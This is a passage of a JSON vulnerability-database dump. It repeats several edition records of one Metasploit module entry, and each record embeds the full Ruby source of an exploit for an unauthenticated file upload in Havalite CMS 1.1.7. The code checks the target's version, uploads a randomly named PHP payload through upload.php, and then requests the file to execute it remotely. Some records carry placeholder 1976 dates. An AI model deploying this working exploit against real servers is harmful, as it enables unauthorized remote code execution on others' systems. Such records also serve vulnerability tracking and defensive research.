execution.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'CWH',\n 'sinn3r' #Metasploit\n ],\n 'References' =>\n [\n ['OSVDB', '94405'],\n ['EDB', '26243']\n ],\n 'Payload' =>\n {\n 'BadChars' => \"\\x00\"\n },\n 'Platform' => %w{ linux php },\n 'Targets' =>\n [\n [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],\n [ 'Linux x86' , { 'Arch' => ARCH_X86, 'Platform' => 'linux'} ]\n ],\n 'Privileged' => false,\n 'DisclosureDate' => \"Jun 17 2013\",\n 'DefaultTarget' => 0))\n\n register_options(\n [\n OptString.new('TARGETURI', [true, 'The base path to havalite', '/'])\n ])\n end\n\n #\n # Checks if target is running HavaLite CMS 1.1.7\n # We only flag 1.1.7 as vulnerable, because we don't have enough information from\n # the vendor or OSVDB about exactly which ones are really vulnerable.\n #\n def check\n uri = normalize_uri(target_uri.path, 'havalite/')\n res = send_request_raw({'uri' => uri})\n\n if not res\n vprint_error(\"Connection timed out\")\n return Exploit::CheckCode::Unknown\n end\n\n js_src = res.body.scan(/<script type=\"text\\/javascript\">(.+)<\\/script>/im).flatten[0] || ''\n version = js_src.scan(/var myVersion = '(.+)';/).flatten[0] || ''\n\n if not version.empty? and version =~ /1\\.1\\.7/\n vprint_status(\"Version found: #{version}\")\n return Exploit::CheckCode::Appears\n end\n\n Exploit::CheckCode::Safe\n end\n\n\n #\n # Uploads our malicious file\n #\n def upload(base)\n p = get_write_exec_payload(:unlink_self=>true)\n fname = \"#{rand_text_alpha(5)}.php\"\n\n data = Rex::MIME::Message.new\n data.add_part(p, \"application/octet-stream\", nil, \"form-data; name=\\\"files[]\\\"; filename=\\\"#{fname}\\\"\")\n post_data = data.to_s\n\n res = send_request_cgi({\n 'method' => 'POST',\n 'uri' => normalize_uri(base, 'havalite', 'upload.php'),\n 'ctype' => \"multipart/form-data; boundary=#{data.bound}\",\n 'data' => post_data\n })\n\n if not res\n fail_with(Failure::Unknown, \"#{peer} - Request timed out while uploading\")\n elsif res.code.to_i == 404\n fail_with(Failure::NotFound, \"#{peer} - No upload.php found\")\n elsif res.body =~ /\"error\"\\:\"abort\"/\n fail_with(Failure::Unknown, \"#{peer} - Unable to write #{fname}\")\n end\n\n return fname\n end\n\n\n #\n # Executes our uploaded malicious file\n #\n def exec(base, payload_fname)\n res = send_request_raw({\n 'uri' => normalize_uri(base, 'havalite','tmp', 'files', payload_fname)\n })\n\n if res and res.code == 404\n fail_with(Failure::NotFound, \"#{peer} - Not found: #{payload_fname}\")\n end\n end\n\n\n def exploit\n base = target_uri.path\n\n print_status(\"Uploading malicious file...\")\n fname = upload(base)\n\n print_status(\"Executing #{fname}...\")\n exec(base, fname)\n end\nend\n", "metasploitReliability": "Excellent", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/unix/webapp/havalite_upload_exec.rb"}, "lastseen": "2018-08-02T03:11:50", "differentElements": ["modified", "published"], "edition": 53}, {"bulletin": {"id": "MSF:EXPLOIT/UNIX/WEBAPP/HAVALITE_UPLOAD_EXEC", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Havalite CMS Arbitary File Upload Vulnerability", "description": "This module exploits a file upload vulnerability found in Havalite CMS 1.1.7, and possibly prior. Attackers can abuse the upload feature in order to upload a malicious PHP file without authentication, which results in arbitrary remote code execution.", "published": "2013-06-19T00:00:42", "modified": "2017-09-08T01:18:50", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2018-08-02T04:58:41", "history": [], "viewCount": 3, "enchantments": {"score": {"value": 9.3, "vector": "NONE"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/unix/webapp/havalite_upload_exec.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::PhpEXE\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => \"Havalite CMS Arbitary File Upload Vulnerability\",\n 'Description' => %q{\n This module exploits a file upload vulnerability found in Havalite CMS 1.1.7, and\n possibly prior. Attackers can abuse the upload feature in order to upload a\n malicious PHP file without authentication, which results in arbitrary remote code\n execution.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'CWH',\n 'sinn3r' #Metasploit\n ],\n 'References' =>\n [\n ['OSVDB', '94405'],\n ['EDB', '26243']\n ],\n 'Payload' =>\n {\n 'BadChars' => \"\\x00\"\n },\n 'Platform' => %w{ linux php },\n 'Targets' =>\n [\n [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],\n [ 'Linux x86' , { 'Arch' => ARCH_X86, 'Platform' => 'linux'} ]\n ],\n 'Privileged' => false,\n 'DisclosureDate' => \"Jun 17 2013\",\n 'DefaultTarget' => 0))\n\n register_options(\n [\n OptString.new('TARGETURI', [true, 'The base path to havalite', '/'])\n ])\n end\n\n #\n # Checks if target is running HavaLite CMS 1.1.7\n # We only flag 1.1.7 as vulnerable, because we don't have enough information from\n # the vendor or OSVDB about exactly which ones are really vulnerable.\n #\n def check\n uri = normalize_uri(target_uri.path, 'havalite/')\n res = send_request_raw({'uri' => uri})\n\n if not res\n vprint_error(\"Connection timed out\")\n return Exploit::CheckCode::Unknown\n end\n\n js_src = res.body.scan(/<script type=\"text\\/javascript\">(.+)<\\/script>/im).flatten[0] || ''\n version = js_src.scan(/var myVersion = '(.+)';/).flatten[0] || ''\n\n if not version.empty? and version =~ /1\\.1\\.7/\n vprint_status(\"Version found: #{version}\")\n return Exploit::CheckCode::Appears\n end\n\n Exploit::CheckCode::Safe\n end\n\n\n #\n # Uploads our malicious file\n #\n def upload(base)\n p = get_write_exec_payload(:unlink_self=>true)\n fname = \"#{rand_text_alpha(5)}.php\"\n\n data = Rex::MIME::Message.new\n data.add_part(p, \"application/octet-stream\", nil, \"form-data; name=\\\"files[]\\\"; filename=\\\"#{fname}\\\"\")\n post_data = data.to_s\n\n res = send_request_cgi({\n 'method' => 'POST',\n 'uri' => normalize_uri(base, 'havalite', 'upload.php'),\n 'ctype' => \"multipart/form-data; boundary=#{data.bound}\",\n 'data' => post_data\n })\n\n if not res\n fail_with(Failure::Unknown, \"#{peer} - Request timed out while uploading\")\n elsif res.code.to_i == 404\n fail_with(Failure::NotFound, \"#{peer} - No upload.php found\")\n elsif res.body =~ /\"error\"\\:\"abort\"/\n fail_with(Failure::Unknown, \"#{peer} - Unable to write #{fname}\")\n end\n\n return fname\n end\n\n\n #\n # Executes our uploaded malicious file\n #\n def exec(base, payload_fname)\n res = send_request_raw({\n 'uri' => normalize_uri(base, 'havalite','tmp', 'files', payload_fname)\n })\n\n if res and res.code == 404\n fail_with(Failure::NotFound, \"#{peer} - Not found: #{payload_fname}\")\n end\n end\n\n\n def exploit\n base = target_uri.path\n\n print_status(\"Uploading malicious file...\")\n fname = upload(base)\n\n print_status(\"Executing #{fname}...\")\n exec(base, fname)\n end\nend\n", "metasploitReliability": "Excellent", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/unix/webapp/havalite_upload_exec.rb"}, "lastseen": "2018-08-02T04:58:41", "differentElements": ["modified", "published"], "edition": 54}, {"bulletin": {"id": "MSF:EXPLOIT/UNIX/WEBAPP/HAVALITE_UPLOAD_EXEC", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Havalite CMS Arbitary File Upload Vulnerability", "description": "This module exploits a file upload vulnerability found in Havalite CMS 1.1.7, and possibly prior. Attackers can abuse the upload feature in order to upload a malicious PHP file without authentication, which results in arbitrary remote code execution.", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2018-08-04T13:12:55", "history": [], "viewCount": 3, "enchantments": {"score": {"value": 9.3, "vector": "NONE"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/unix/webapp/havalite_upload_exec.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::PhpEXE\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => \"Havalite CMS Arbitary File Upload Vulnerability\",\n 'Description' => %q{\n This module exploits a file upload vulnerability found in Havalite CMS 1.1.7, and\n possibly prior. Attackers can abuse the upload feature in order to upload a\n malicious PHP file without authentication, which results in arbitrary remote code\n execution.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'CWH',\n 'sinn3r' #Metasploit\n ],\n 'References' =>\n [\n ['OSVDB', '94405'],\n ['EDB', '26243']\n ],\n 'Payload' =>\n {\n 'BadChars' => \"\\x00\"\n },\n 'Platform' => %w{ linux php },\n 'Targets' =>\n [\n [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],\n [ 'Linux x86' , { 'Arch' => ARCH_X86, 'Platform' => 'linux'} ]\n ],\n 'Privileged' => false,\n 'DisclosureDate' => \"Jun 17 2013\",\n 'DefaultTarget' => 0))\n\n register_options(\n [\n OptString.new('TARGETURI', [true, 'The base path to havalite', '/'])\n ])\n end\n\n #\n # Checks if target is running HavaLite CMS 1.1.7\n # We only flag 1.1.7 as vulnerable, because we don't have enough information from\n # the vendor or OSVDB about exactly which ones are really vulnerable.\n #\n def check\n uri = normalize_uri(target_uri.path, 'havalite/')\n res = send_request_raw({'uri' => uri})\n\n if not res\n vprint_error(\"Connection timed out\")\n return Exploit::CheckCode::Unknown\n end\n\n js_src = res.body.scan(/<script type=\"text\\/javascript\">(.+)<\\/script>/im).flatten[0] || ''\n version = js_src.scan(/var myVersion = '(.+)';/).flatten[0] || ''\n\n if not version.empty? and version =~ /1\\.1\\.7/\n vprint_status(\"Version found: #{version}\")\n return Exploit::CheckCode::Appears\n end\n\n Exploit::CheckCode::Safe\n end\n\n\n #\n # Uploads our malicious file\n #\n def upload(base)\n p = get_write_exec_payload(:unlink_self=>true)\n fname = \"#{rand_text_alpha(5)}.php\"\n\n data = Rex::MIME::Message.new\n data.add_part(p, \"application/octet-stream\", nil, \"form-data; name=\\\"files[]\\\"; filename=\\\"#{fname}\\\"\")\n post_data = data.to_s\n\n res = send_request_cgi({\n 'method' => 'POST',\n 'uri' => normalize_uri(base, 'havalite', 'upload.php'),\n 'ctype' => \"multipart/form-data; boundary=#{data.bound}\",\n 'data' => post_data\n })\n\n if not res\n fail_with(Failure::Unknown, \"#{peer} - Request timed out while uploading\")\n elsif res.code.to_i == 404\n fail_with(Failure::NotFound, \"#{peer} - No upload.php found\")\n elsif res.body =~ /\"error\"\\:\"abort\"/\n fail_with(Failure::Unknown, \"#{peer} - Unable to write #{fname}\")\n end\n\n return fname\n end\n\n\n #\n # Executes our uploaded malicious file\n #\n def exec(base, payload_fname)\n res = send_request_raw({\n 'uri' => normalize_uri(base, 'havalite','tmp', 'files', payload_fname)\n })\n\n if res and res.code == 404\n fail_with(Failure::NotFound, \"#{peer} - Not found: #{payload_fname}\")\n end\n end\n\n\n def exploit\n base = target_uri.path\n\n print_status(\"Uploading malicious file...\")\n fname = upload(base)\n\n print_status(\"Executing #{fname}...\")\n exec(base, fname)\n end\nend\n", "metasploitReliability": "Excellent", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/unix/webapp/havalite_upload_exec.rb"}, "lastseen": "2018-08-04T13:12:55", "differentElements": ["modified", "published"], "edition": 55}, {"bulletin": {"id": "MSF:EXPLOIT/UNIX/WEBAPP/HAVALITE_UPLOAD_EXEC", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Havalite CMS Arbitary File Upload Vulnerability", "description": "This module exploits a file upload vulnerability found in Havalite CMS 1.1.7, and possibly prior. Attackers can abuse the upload feature in order to upload a malicious PHP file without authentication, which results in arbitrary remote code execution.", "published": "2013-06-19T00:00:42", "modified": "2017-09-08T01:18:50", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2018-08-04T15:04:02", "history": [], "viewCount": 3, "enchantments": {"score": {"value": 9.3, "vector": "NONE"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/unix/webapp/havalite_upload_exec.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::PhpEXE\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => \"Havalite CMS Arbitary File Upload Vulnerability\",\n 'Description' => %q{\n This module exploits a file upload vulnerability found in Havalite CMS 1.1.7, and\n possibly prior. Attackers can abuse the upload feature in order to upload a\n malicious PHP file without authentication, which results in arbitrary remote code\n execution.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'CWH',\n 'sinn3r' #Metasploit\n ],\n 'References' =>\n [\n ['OSVDB', '94405'],\n ['EDB', '26243']\n ],\n 'Payload' =>\n {\n 'BadChars' => \"\\x00\"\n },\n 'Platform' => %w{ linux php },\n 'Targets' =>\n [\n [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],\n [ 'Linux x86' , { 'Arch' => ARCH_X86, 'Platform' => 'linux'} ]\n ],\n 'Privileged' => false,\n 'DisclosureDate' => \"Jun 17 2013\",\n 'DefaultTarget' => 0))\n\n register_options(\n [\n OptString.new('TARGETURI', [true, 'The base path to havalite', '/'])\n ])\n end\n\n #\n # Checks if target is running HavaLite CMS 1.1.7\n # We only flag 1.1.7 as vulnerable, because we don't have enough information from\n # the vendor or OSVDB about exactly which ones are really vulnerable.\n #\n def check\n uri = normalize_uri(target_uri.path, 'havalite/')\n res = send_request_raw({'uri' => uri})\n\n if not res\n vprint_error(\"Connection timed out\")\n return Exploit::CheckCode::Unknown\n end\n\n js_src = res.body.scan(/<script type=\"text\\/javascript\">(.+)<\\/script>/im).flatten[0] || ''\n version = js_src.scan(/var myVersion = '(.+)';/).flatten[0] || ''\n\n if not version.empty? and version =~ /1\\.1\\.7/\n vprint_status(\"Version found: #{version}\")\n return Exploit::CheckCode::Appears\n end\n\n Exploit::CheckCode::Safe\n end\n\n\n #\n # Uploads our malicious file\n #\n def upload(base)\n p = get_write_exec_payload(:unlink_self=>true)\n fname = \"#{rand_text_alpha(5)}.php\"\n\n data = Rex::MIME::Message.new\n data.add_part(p, \"application/octet-stream\", nil, \"form-data; name=\\\"files[]\\\"; filename=\\\"#{fname}\\\"\")\n post_data = data.to_s\n\n res = send_request_cgi({\n 'method' => 'POST',\n 'uri' => normalize_uri(base, 'havalite', 'upload.php'),\n 'ctype' => \"multipart/form-data; boundary=#{data.bound}\",\n 'data' => post_data\n })\n\n if not res\n fail_with(Failure::Unknown, \"#{peer} - Request timed out while uploading\")\n elsif res.code.to_i == 404\n fail_with(Failure::NotFound, \"#{peer} - No upload.php found\")\n elsif res.body =~ /\"error\"\\:\"abort\"/\n fail_with(Failure::Unknown, \"#{peer} - Unable to write #{fname}\")\n end\n\n return fname\n end\n\n\n #\n # Executes our uploaded malicious file\n #\n def exec(base, payload_fname)\n res = send_request_raw({\n 'uri' => normalize_uri(base, 'havalite','tmp', 'files', payload_fname)\n })\n\n if res and res.code == 404\n fail_with(Failure::NotFound, \"#{peer} - Not found: #{payload_fname}\")\n end\n end\n\n\n def exploit\n base = target_uri.path\n\n print_status(\"Uploading malicious file...\")\n fname = upload(base)\n\n print_status(\"Executing #{fname}...\")\n exec(base, fname)\n end\nend\n", "metasploitReliability": "Excellent", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/unix/webapp/havalite_upload_exec.rb"}, "lastseen": "2018-08-04T15:04:02", "differentElements": ["modified", "published"], "edition": 56}, {"bulletin": {"id": "MSF:EXPLOIT/UNIX/WEBAPP/HAVALITE_UPLOAD_EXEC", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Havalite CMS Arbitary File Upload Vulnerability", "description": "This module exploits a file upload vulnerability found in Havalite CMS 1.1.7, and possibly prior. Attackers can abuse the upload feature in order to upload a malicious PHP file without authentication, which results in arbitrary remote code execution.", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2018-08-09T07:29:07", "history": [], "viewCount": 3, "enchantments": {"score": {"value": 9.3, "vector": "NONE"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/unix/webapp/havalite_upload_exec.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::PhpEXE\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => \"Havalite CMS Arbitary File Upload Vulnerability\",\n 'Description' => %q{\n This module exploits a file upload vulnerability found in Havalite CMS 1.1.7, and\n possibly prior. Attackers can abuse the upload feature in order to upload a\n malicious PHP file without authentication, which results in arbitrary remote code\n execution.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'CWH',\n 'sinn3r' #Metasploit\n ],\n 'References' =>\n [\n ['OSVDB', '94405'],\n ['EDB', '26243']\n ],\n 'Payload' =>\n {\n 'BadChars' => \"\\x00\"\n },\n 'Platform' => %w{ linux php },\n 'Targets' =>\n [\n [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],\n [ 'Linux x86' , { 'Arch' => ARCH_X86, 'Platform' => 'linux'} ]\n ],\n 'Privileged' => false,\n 'DisclosureDate' => \"Jun 17 2013\",\n 'DefaultTarget' => 0))\n\n register_options(\n [\n OptString.new('TARGETURI', [true, 'The base path to havalite', '/'])\n ])\n end\n\n #\n # Checks if target is running HavaLite CMS 1.1.7\n # We only flag 1.1.7 as vulnerable, because we don't have enough information from\n # the vendor or OSVDB about exactly which ones are really vulnerable.\n #\n def check\n uri = normalize_uri(target_uri.path, 'havalite/')\n res = send_request_raw({'uri' => uri})\n\n if not res\n vprint_error(\"Connection timed out\")\n return Exploit::CheckCode::Unknown\n end\n\n js_src = res.body.scan(/<script type=\"text\\/javascript\">(.+)<\\/script>/im).flatten[0] || ''\n version = js_src.scan(/var myVersion = '(.+)';/).flatten[0] || ''\n\n if not version.empty? and version =~ /1\\.1\\.7/\n vprint_status(\"Version found: #{version}\")\n return Exploit::CheckCode::Appears\n end\n\n Exploit::CheckCode::Safe\n end\n\n\n #\n # Uploads our malicious file\n #\n def upload(base)\n p = get_write_exec_payload(:unlink_self=>true)\n fname = \"#{rand_text_alpha(5)}.php\"\n\n data = Rex::MIME::Message.new\n data.add_part(p, \"application/octet-stream\", nil, \"form-data; name=\\\"files[]\\\"; filename=\\\"#{fname}\\\"\")\n post_data = data.to_s\n\n res = send_request_cgi({\n 'method' => 'POST',\n 'uri' => normalize_uri(base, 'havalite', 'upload.php'),\n 'ctype' => \"multipart/form-data; boundary=#{data.bound}\",\n 'data' => post_data\n })\n\n if not res\n fail_with(Failure::Unknown, \"#{peer} - Request timed out while uploading\")\n elsif res.code.to_i == 404\n fail_with(Failure::NotFound, \"#{peer} - No upload.php found\")\n elsif res.body =~ /\"error\"\\:\"abort\"/\n fail_with(Failure::Unknown, \"#{peer} - Unable to write #{fname}\")\n end\n\n return fname\n end\n\n\n #\n # Executes our uploaded malicious file\n #\n def exec(base, payload_fname)\n res = send_request_raw({\n 'uri' => normalize_uri(base, 'havalite','tmp', 'files', payload_fname)\n })\n\n if res and res.code == 404\n fail_with(Failure::NotFound, \"#{peer} - Not found: #{payload_fname}\")\n end\n end\n\n\n def exploit\n base = target_uri.path\n\n print_status(\"Uploading malicious file...\")\n fname = upload(base)\n\n print_status(\"Executing #{fname}...\")\n exec(base, fname)\n end\nend\n", "metasploitReliability": "Excellent", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/unix/webapp/havalite_upload_exec.rb"}, "lastseen": "2018-08-09T07:29:07", "differentElements": ["modified", "published"], "edition": 57}, {"bulletin": {"id": "MSF:EXPLOIT/UNIX/WEBAPP/HAVALITE_UPLOAD_EXEC", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Havalite CMS Arbitary File Upload Vulnerability", "description": "This module exploits a file upload vulnerability found in Havalite CMS 1.1.7, and possibly prior. Attackers can abuse the upload feature in order to upload a malicious PHP file without authentication, which results in arbitrary remote code execution.", "published": "2013-06-19T00:00:42", "modified": "2017-09-08T01:18:50", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2018-08-09T11:10:02", "history": [], "viewCount": 3, "enchantments": {"score": {"value": 9.3, "vector": "NONE"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/unix/webapp/havalite_upload_exec.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::PhpEXE\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => \"Havalite CMS Arbitary File Upload Vulnerability\",\n 'Description' => %q{\n This module exploits a file upload vulnerability found in Havalite CMS 1.1.7, and\n possibly prior. Attackers can abuse the upload feature in order to upload a\n malicious PHP file without authentication, which results in arbitrary remote code\n execution.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'CWH',\n 'sinn3r' #Metasploit\n ],\n 'References' =>\n [\n ['OSVDB', '94405'],\n ['EDB', '26243']\n ],\n 'Payload' =>\n {\n 'BadChars' => \"\\x00\"\n },\n 'Platform' => %w{ linux php },\n 'Targets' =>\n [\n [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],\n [ 'Linux x86' , { 'Arch' => ARCH_X86, 'Platform' => 'linux'} ]\n ],\n 'Privileged' => false,\n 'DisclosureDate' => \"Jun 17 2013\",\n 'DefaultTarget' => 0))\n\n register_options(\n [\n OptString.new('TARGETURI', [true, 'The base path to havalite', '/'])\n ])\n end\n\n #\n # Checks if target is running HavaLite CMS 1.1.7\n # We only flag 1.1.7 as vulnerable, because we don't have enough information from\n # the vendor or OSVDB about exactly which ones are really vulnerable.\n #\n def check\n uri = normalize_uri(target_uri.path, 'havalite/')\n res = send_request_raw({'uri' => uri})\n\n if not res\n vprint_error(\"Connection timed out\")\n return Exploit::CheckCode::Unknown\n end\n\n js_src = res.body.scan(/<script type=\"text\\/javascript\">(.+)<\\/script>/im).flatten[0] || ''\n version = js_src.scan(/var myVersion = '(.+)';/).flatten[0] || ''\n\n if not version.empty? and version =~ /1\\.1\\.7/\n vprint_status(\"Version found: #{version}\")\n return Exploit::CheckCode::Appears\n end\n\n Exploit::CheckCode::Safe\n end\n\n\n #\n # Uploads our malicious file\n #\n def upload(base)\n p = get_write_exec_payload(:unlink_self=>true)\n fname = \"#{rand_text_alpha(5)}.php\"\n\n data = Rex::MIME::Message.new\n data.add_part(p, \"application/octet-stream\", nil, \"form-data; name=\\\"files[]\\\"; filename=\\\"#{fname}\\\"\")\n post_data = data.to_s\n\n res = send_request_cgi({\n 'method' => 'POST',\n 'uri' => normalize_uri(base, 'havalite', 'upload.php'),\n 'ctype' => \"multipart/form-data; boundary=#{data.bound}\",\n 'data' => post_data\n })\n\n if not res\n fail_with(Failure::Unknown, \"#{peer} - Request timed out while uploading\")\n elsif res.code.to_i == 404\n fail_with(Failure::NotFound, \"#{peer} - No upload.php found\")\n elsif res.body =~ /\"error\"\\:\"abort\"/\n fail_with(Failure::Unknown, \"#{peer} - Unable to write #{fname}\")\n end\n\n return fname\n end\n\n\n #\n # Executes our uploaded malicious file\n #\n def exec(base, payload_fname)\n res = send_request_raw({\n 'uri' => normalize_uri(base, 'havalite','tmp', 'files', payload_fname)\n })\n\n if res and res.code == 404\n fail_with(Failure::NotFound, \"#{peer} - Not found: #{payload_fname}\")\n end\n end\n\n\n def exploit\n base = target_uri.path\n\n print_status(\"Uploading malicious file...\")\n fname = upload(base)\n\n print_status(\"Executing #{fname}...\")\n exec(base, fname)\n end\nend\n", "metasploitReliability": "Excellent", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/unix/webapp/havalite_upload_exec.rb"}, "lastseen": "2018-08-09T11:10:02", "differentElements": ["modified", "published"], "edition": 58}, {"bulletin": {"id": "MSF:EXPLOIT/UNIX/WEBAPP/HAVALITE_UPLOAD_EXEC", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Havalite CMS Arbitary File Upload Vulnerability", "description": "This module exploits a file upload vulnerability found in Havalite CMS 1.1.7, and possibly prior. Attackers can abuse the upload feature in order to upload a malicious PHP file without authentication, which results in arbitrary remote code execution.", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2018-08-12T19:27:31", "history": [], "viewCount": 3, "enchantments": {"score": {"value": 9.3, "vector": "NONE"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/unix/webapp/havalite_upload_exec.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::PhpEXE\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => \"Havalite CMS Arbitary File Upload Vulnerability\",\n 'Description' => %q{\n This module exploits a file upload vulnerability found in Havalite CMS 1.1.7, and\n possibly prior. Attackers can abuse the upload feature in order to upload a\n malicious PHP file without authentication, which results in arbitrary remote code\n execution.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'CWH',\n 'sinn3r' #Metasploit\n ],\n 'References' =>\n [\n ['OSVDB', '94405'],\n ['EDB', '26243']\n ],\n 'Payload' =>\n {\n 'BadChars' => \"\\x00\"\n },\n 'Platform' => %w{ linux php },\n 'Targets' =>\n [\n [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],\n [ 'Linux x86' , { 'Arch' => ARCH_X86, 'Platform' => 'linux'} ]\n ],\n 'Privileged' => false,\n 'DisclosureDate' => \"Jun 17 2013\",\n 'DefaultTarget' => 0))\n\n register_options(\n [\n OptString.new('TARGETURI', [true, 'The base path to havalite', '/'])\n ])\n end\n\n #\n # Checks if target is running HavaLite CMS 1.1.7\n # We only flag 1.1.7 as vulnerable, because we don't have enough information from\n # the vendor or OSVDB about exactly which ones are really vulnerable.\n #\n def check\n uri = normalize_uri(target_uri.path, 'havalite/')\n res = send_request_raw({'uri' => uri})\n\n if not res\n vprint_error(\"Connection timed out\")\n return Exploit::CheckCode::Unknown\n end\n\n js_src = res.body.scan(/<script type=\"text\\/javascript\">(.+)<\\/script>/im).flatten[0] || ''\n version = js_src.scan(/var myVersion = '(.+)';/).flatten[0] || ''\n\n if not version.empty? and version =~ /1\\.1\\.7/\n vprint_status(\"Version found: #{version}\")\n return Exploit::CheckCode::Appears\n end\n\n Exploit::CheckCode::Safe\n end\n\n\n #\n # Uploads our malicious file\n #\n def upload(base)\n p = get_write_exec_payload(:unlink_self=>true)\n fname = \"#{rand_text_alpha(5)}.php\"\n\n data = Rex::MIME::Message.new\n data.add_part(p, \"application/octet-stream\", nil, \"form-data; name=\\\"files[]\\\"; filename=\\\"#{fname}\\\"\")\n post_data = data.to_s\n\n res = send_request_cgi({\n 'method' => 'POST',\n 'uri' => normalize_uri(base, 'havalite', 'upload.php'),\n 'ctype' => \"multipart/form-data; boundary=#{data.bound}\",\n 'data' => post_data\n })\n\n if not res\n fail_with(Failure::Unknown, \"#{peer} - Request timed out while uploading\")\n elsif res.code.to_i == 404\n fail_with(Failure::NotFound, \"#{peer} - No upload.php found\")\n elsif res.body =~ /\"error\"\\:\"abort\"/\n fail_with(Failure::Unknown, \"#{peer} - Unable to write #{fname}\")\n end\n\n return fname\n end\n\n\n #\n # Executes our uploaded malicious file\n #\n def exec(base, payload_fname)\n res = send_request_raw({\n 'uri' => normalize_uri(base, 'havalite','tmp', 'files', payload_fname)\n })\n\n if res and res.code == 404\n fail_with(Failure::NotFound, \"#{peer} - Not found: #{payload_fname}\")\n end\n end\n\n\n def exploit\n base = target_uri.path\n\n print_status(\"Uploading malicious file...\")\n fname = upload(base)\n\n print_status(\"Executing #{fname}...\")\n exec(base, fname)\n end\nend\n", "metasploitReliability": "Excellent", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/unix/webapp/havalite_upload_exec.rb"}, "lastseen": "2018-08-12T19:27:31", "differentElements": ["modified", "published"], "edition": 59}, {"bulletin": 